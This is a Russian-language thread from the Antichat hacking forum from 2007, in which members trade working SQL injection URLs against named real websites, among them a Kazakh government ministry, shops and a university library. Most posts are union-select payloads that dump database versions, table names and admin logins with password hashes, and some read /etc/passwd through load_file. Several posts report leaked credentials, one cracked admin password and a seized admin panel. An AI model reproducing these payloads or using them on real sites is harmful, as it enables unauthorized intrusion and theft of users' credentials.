ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1561  
Старый 02.04.2007, 19:36
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://www.content-c.ru/level.php?id=-22+union+select+1,2,3,concat_ws(char(58),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15/*
p.s 500 мессяга
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1562  
Старый 02.04.2007, 19:37
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от n1†R0x  
меня глючит или пароль не выведен? колонка 'passw'
Код:
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,concat(login,0x3a,passw),4,5,6,7,8,9,10,11+from+users/*
admin:a98948bf0421ef30e4e19c0b4844600d
/me ступил=\\\
__________________
..
 
Ответить с цитированием

  #1563  
Старый 02.04.2007, 19:47
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Вот мой второй скуль)
Цитата:
http://svadba.irk.ru/catalog.php?id=1'
Поля...
Цитата:
http://svadba.irk.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8
А чёто все остальное не катит..
 
Ответить с цитированием

  #1564  
Старый 02.04.2007, 20:25
Аватар для =faraon=
=faraon=
Познающий
Регистрация: 01.04.2007
Сообщений: 62
Провел на форуме:
241297

Репутация: 49
По умолчанию

Скуль :
http://www.elit-flowers.ru/katalog-list.php?code=1'

Поля :
http://www.elit-flowers.ru/katalog-list.php?code=-1+union+select+1,2,3,4,5
 
Ответить с цитированием

  #1565  
Старый 02.04.2007, 20:41
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

runiga.com
Испанская недвижимость, российское представительство.

сайт:
Код:
http://www.runiga.com/ruso/home.php?pageid=189&idioma=-1+union+select+1,2,3,concat(login,0x3a,passwd),5,6,7,8,9+from+users/*
список юзер:пасс в открытом виде.

форум phpbb:
Код:
http://www.runiga.com/ruso/home.php?pageid=189&idioma=-1+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9+from+phpbb_users/*
Admin:aa7cae5a92226d97ba0654db0dd070b1 = pa2310
вуаля, админка захвачена
1.5k юзеров вроде..

Последний раз редактировалось n1†R0x; 03.04.2007 в 00:18..
 
Ответить с цитированием

  #1566  
Старый 02.04.2007, 21:13
Аватар для Kryonn
Kryonn
Новичок
Регистрация: 21.01.2007
Сообщений: 3
Провел на форуме:
19270

Репутация: 7
Отправить сообщение для Kryonn с помощью ICQ
По умолчанию

http://www.oxid.ru/notes/show.php?stid=-2045+union+select+1,2,concat(login,char(58),pass,c har(58),email),4,5,6,7,8,9,0,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,load_file(0x2f6574632f7061 73737764),27,28,29,30,31,32,33,34+from+users/*

На этом сайте можно все
Но, к сожаления, практическая польза отсутствует(
-----------------------------------
Вот еще одна
http://xlinenn.ru/shop.php?cats=-187+union+select+1,2+from+user/*
 
Ответить с цитированием

  #1567  
Старый 02.04.2007, 21:21
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.saratoff-road.ru/?showtov=-1+union+select+1,database(),3,user(),version(),6,7/*
http://www.saratoff-road.ru/?showtov=-1+union+select+1,2,3,concat(login,char(58),pass),5,6,7+from+users/*
 
Ответить с цитированием

  #1568  
Старый 02.04.2007, 21:57
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

http://www.dengi-info.com/
Код:
http://www.dengi-info.com/news/?nid=-40097+union+select+1,2,3,4,5,6/*
собствено ничего интресного не нашел, можеть кто нить другой найдет

МИНИСТЕРСТВО ТРУДА И СОЦИАЛЬНОЙ ЗАЩИТЫ НАСЕЛЕНИЯ РЕСПУБЛИКИ КАЗАХСТАН

Код:
http://www.enbek.kz/law/lawdetail.php?recordID=-121+union+select+1,2,concat(login,char(58),passwd)+from+admin/*
http://www.enbek.kz/law/lawdetail.php?recordID=-121+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764)/*
ищем админку

Последний раз редактировалось maxster; 02.04.2007 в 22:29..
 
Ответить с цитированием

  #1569  
Старый 02.04.2007, 22:21
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.mk-rossi.ru/?page=prod&id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version())/*
http://www.mk-rossi.ru/?page=prod&id=-1+union+select+1,2,table_name+from+information_schema.tables+limit+25,1/*
http://www.mk-rossi.ru/?page=prod&id=-1+union+select+1,2,column_name+from+information_schema.columns+where+table_name=char(97,99,99,95,97,100,109,105,110,95,117,115,101,114,115)+limit+0,1/*
http://www.mk-rossi.ru/?page=prod&id=-1+union+select+1,2,concat(id,char(58),name,char(58),content,char(58),password,char(58),email,char(58),fio,char(58),dolznost,char(58),user_group)+from+acc_admin_users/*
 
Ответить с цитированием

  #1570  
Старый 02.04.2007, 22:35
Аватар для random
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972

Репутация: 250
По умолчанию

Женский журнал Роксо
Код:
http://roxo.kiev.ua/showarticle.php?id=-348+union+select+1,2,3,4,5,6/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ